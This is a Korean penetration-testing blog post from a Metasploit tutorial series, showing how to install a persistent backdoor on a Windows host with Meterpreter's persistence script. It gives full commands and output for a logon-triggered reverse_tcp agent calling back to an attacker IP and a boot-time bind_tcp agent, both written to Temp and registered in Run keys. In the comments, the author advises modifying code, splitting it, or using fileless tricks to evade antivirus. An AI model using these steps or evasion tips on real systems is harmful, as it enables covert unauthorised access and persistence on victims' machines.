| | at : |


Archive

[MAD-METASPLOIT] 0x34 - Persistence Backdoor 하훌 rwxr-xr-x 2 8/07/2017



[MAD-METASPLOIT] 0x34 - Persistence Backdoor

Permission rw-r--r--
Author 하훌
Date and Time 8/07/2017
Label
License 크리에이티브 커먼즈 라이선스





Persistence backdoor

Meterpreter는 Persistence 를 이용하여 시스템에 백도어를 남겨 지속적으로 접근할 수 있는 통로를 만들 수 있습니다.

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

각각 옵션에 따라 부팅 시 , 로그온 시 등 설정이 가능합니다.

User 로그온 시 reverse connection 하도록 backdoor 생성


meterpreter > run persistence -U -i 5 -p 22 -r 192.168.56.101

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.5914/HAHWUL_20170807.5914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99642 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[+] Agent executed with PID 8068
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb


System이 부팅되자마자 22번 포트를 bind 시키는 형태의 backdoor 생성


meterpreter > run persistence -X -i 5 -p 22 -r 192.168.56.101 -P windows/meterpreter/bind_tcp

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.0044/HAHWUL_20170807.0044.rc
[*] Creating Payload=windows/meterpreter/bind_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99692 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[+] Agent executed with PID 1592
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao



Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM






Recent Post

댓글 2개:

  1. Persistence 옵션의 경우 대부분 antivirus에 감지되는것 같은데.
    수동이 나을까요 어떤 방법이 있을까요?

    답글삭제
    답글
    1. 수동도 좋은 방법이나 좀 귀찮긴하겠죠. 패턴에 의해 탐지되는 persistence도 결국은 코드로 구성되어 있으니 일부분 수정해서 패턴 우회하는 방법도 깔끔할 것 같습니다.

      파일 기반으로 움직이는게 백신에 탐지될 확률이 높으니 저라면 코드를 분산해서 조합하는 방식으로 해봐도 좋을 것 같네요.

      코드엔진에서 들었던 내용인데, 시스템 종료 시 PC에 재시동, 백도어 코드 남기고 부팅 시 다시 삭제 처리하는 방식으로 하던 fileless 기법도 있었습니다. 머리 잘 굴려보면 기존 프레임 유지하면서 백신 피해갈 수 있는 방법들이 있을 것 같네요

      삭제